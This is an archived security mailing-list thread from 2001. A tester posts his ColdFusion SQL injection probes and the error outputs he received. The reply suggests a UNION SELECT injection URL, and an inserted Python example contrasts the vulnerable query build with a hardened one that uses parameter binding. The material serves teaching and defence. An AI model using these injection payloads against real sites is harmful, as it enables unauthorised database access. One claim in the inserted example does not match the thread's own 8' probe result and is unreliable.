Re: CFM SQL injection

From: Kevin Spett (kspett@spidynamics.com)
Date: 12/18/01


From: "Kevin Spett" <kspett@spidynamics.com>
To: <Chili@SexMagnet.com>, <pen-test@security-focus.com>
Date: Mon, 17 Dec 2001 15:39:29 -0800


    It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

    This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

    Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.
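The reply above turns on one detail: the page_id value is appended to the SQL text without quotes, so a numeric-looking parameter can carry SQL. The script below is an added example for this thread, not code from the list, from Kevin, or from any ColdFusion application. It uses an in-memory SQLite database with constructed TableName and OtherTable rows, builds the query exactly as Kevin sketches it, and contrasts that with a hardened builder that checks the value is an integer (the effect a numeric cfparam has) and binds it as a query parameter. The probes are the ones already in the thread; the 'rejected' and 'sql_error' labels are my own.

```python
import re
import sqlite3

# Constructed sample schema standing in for the TableName / OtherTable named
# in the thread; the rows are invented for this example.
SCHEMA = """
CREATE TABLE TableName (PageID INTEGER, FieldOne TEXT, FieldTwo TEXT, FieldThree TEXT);
INSERT INTO TableName VALUES (8, 'home', 'Welcome', 'public');
CREATE TABLE OtherTable (OtherField TEXT);
INSERT INTO OtherTable VALUES ('not meant for page readers');
"""

# The probe from Kevin's reply and the ones from Charlie's original post.
UNION_PROBE = "9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1"
PROBES = ("8", "8'", "3,4", UNION_PROBE)


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_unquoted(str_page_id):
    # The string build Kevin describes: the raw parameter is appended with no
    # quotes, so everything after the digits is parsed by the database as SQL.
    return ("SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = "
            + str_page_id)


def fetch_page_vulnerable(conn, raw_page_id):
    return conn.execute(build_query_unquoted(raw_page_id)).fetchall()


def parse_page_id(raw):
    # Same effect as a numeric cfparam check: only a plain integer gets
    # through; anything else is rejected before any query is built.
    if re.fullmatch(r"-?\d+", raw.strip()) is None:
        raise ValueError("page_id must be an integer, got %r" % raw)
    return int(raw)


def fetch_page_safe(conn, raw_page_id):
    page_id = parse_page_id(raw_page_id)
    # Bound parameter: the value travels separately from the SQL text, so the
    # database engine never treats it as part of the statement.
    return conn.execute(
        "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = ?",
        (page_id,),
    ).fetchall()


def probe(conn, fetch, raw):
    """Run one probe and report what the error page would reveal: result
    rows, an application-level rejection, or a database error message."""
    try:
        return ("rows", fetch(conn, raw))
    except ValueError as exc:
        return ("rejected", str(exc))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


if __name__ == "__main__":
    db = open_db()
    for raw in PROBES:
        print("%-55r vulnerable: %s" % (raw, probe(db, fetch_page_vulnerable, raw)))
        print("%-55r hardened:   %s" % (raw, probe(db, fetch_page_safe, raw)))
```

Run as is, the unquoted build reproduces the thread's symptoms: `3,4` and `8'` come back as database syntax errors, and the UNION probe produces a column-count error from the engine, which is exactly the kind of structural hint Kevin says to look for. The hardened build never lets any of those three reach the database; in ColdFusion the same two-step fix is a numeric cfparam plus cfqueryparam on the query itself.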

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a web site with ColdFusion installed. I
> obtain some error information, but I'm not able to do anything because the
> server never understands the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are as follows:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:\blabla\page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands. It
> seems that it is not an SQL issue; instead it looks like a ColdFusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, I get an error from the SQL database. But I still don't know how to
> take advantage of it. I don't know the database name and I have very little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/